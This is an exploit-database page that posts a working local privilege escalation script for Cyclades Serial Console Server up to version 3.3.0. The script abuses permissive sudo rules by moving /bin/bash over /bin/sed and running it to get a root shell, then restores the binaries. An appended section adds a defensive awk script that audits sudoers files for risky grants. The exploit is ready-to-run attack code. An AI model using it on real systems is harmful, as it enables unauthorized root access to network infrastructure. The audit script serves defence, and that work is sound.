0day.today - Biggest Exploit Database in the World.
Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation Vulnerability
```bash
# Exploit Title: Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation
# Exploit Author: @ibby
# Vendor Homepage: https://www.vertiv.com/en-us/
# Software Link: https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip
# Version: Legacy Versions V_1.0.0 to V_3.3.0-16
# Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16)
# CVE : N/A

# The reason this exists, is the admin user & user group is the default user for these devices. The software ships with overly permissive sudo privileges
## for any user in the admin group, or the default admin user. This vulnerability exists in all legacy versions of the software - the last version being from ~2014.
### This vulnerability does not exist in the newer distributions of the ACS Software.

#!/bin/bash

## NOTE: To view the vulnerability yourself, uncomment the below code & run as sudo, since it's mounting a file system.
## The software is publicly available, this will grab it and unpack the firmware for you.

#TMPDIR=$(mktemp -d)
#curl 'https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip' -o FL0536-017.zip && unzip FL0536-017.zip && binwalk -e FL0536-017.bin
#sudo mount -o ro,loop _FL0536-017.bin.extracted/148000 $TMPDIR && sudo cat "$TMPDIR/etc/sudoers"
#echo "As you can see, the sudo permissions on various binaries, like that of /bin/mv, are risky."

# ! EXPLOIT CODE BELOW ! #
# -------
# Once you exit the root shell, this will clean up and put the binaries back where they belong.
echo "Creating backups of sed & bash binaries"
sudo cp /bin/sed /bin/sed.bak
sudo cp /bin/bash /bin/bash.bak
echo "Saved as bash.bak & sed.bak"
sudo mv /bin/bash /bin/sed
sudo /bin/sed
echo "Replacing our binary with the proper one"
sudo mv /bin/bash.bak /bin/bash && sudo mv /bin/sed.bak /bin/sed

#  0day.today [2024-07-07]  #
```
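The root cause named above is a sudoers file that lets the admin group run binaries such as /bin/mv as root. The audit script below is an added example, not part of the original advisory or the vendor's software; the `RISKY` list, the function names and the sample sudoers content are assumptions constructed for illustration.

```shell
#!/bin/bash
# Added example: audit a sudoers file for rules that let a non-root principal
# run file-replacing binaries as root (the /bin/mv pattern described above).
# RISKY is an assumed, non-exhaustive list; aliases and includes are not expanded.
RISKY='mv cp tee dd install ln chmod chown'

# audit_sudoers [FILE]: reads FILE (or stdin), prints "principal<TAB>command"
# for every risky grant, and returns 1 if anything was flagged.
audit_sudoers() {
    awk -v risky="$RISKY" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    {
        line = buf $0
        if (sub(/\\$/, "", line)) { buf = line; next }   # join continuation lines
        buf = ""
        if (line ~ /^[ \t]*(#|$)/) next                   # comments, blank lines
        if (line ~ /^[ \t]*(Defaults|[A-Za-z]+_Alias)/) next
        eq = index(line, "=")
        if (!eq) next
        split(line, head, " "); who = head[1]
        if (who == "root") next                           # root itself is expected
        cmds = substr(line, eq + 1)
        gsub(/\([^)]*\)/, "", cmds)                       # drop (runas) specs
        gsub(/[A-Z_]+:/, "", cmds)                        # drop tags like NOPASSWD:
        m = split(cmds, c, ",")
        for (j = 1; j <= m; j++) {
            sub(/^[ \t]+/, "", c[j])
            split(c[j], w, " "); path = w[1]
            base = path; sub(/.*\//, "", base)
            if (path == "ALL" || (base in bad)) { print who "\t" path; hits++ }
        }
    }
    END { exit (hits > 0) }
    ' "${1:--}"
}

# Constructed sample input, not the actual sudoers file shipped on the device.
sample_sudoers() {
    cat <<'EOF'
Defaults env_reset
root     ALL=(ALL) ALL
%admin   ALL = NOPASSWD: /bin/mv, /bin/ls, \
         /usr/bin/tee
operator ALL=(root) /sbin/reboot
EOF
}

sample_sudoers | audit_sudoers || echo "risky sudo grants found" >&2
```

Pass a path, for example a sudoers file taken from an unpacked firmware image, as the first argument; the non-zero return on findings lets the function act as a gate in a build or compliance check.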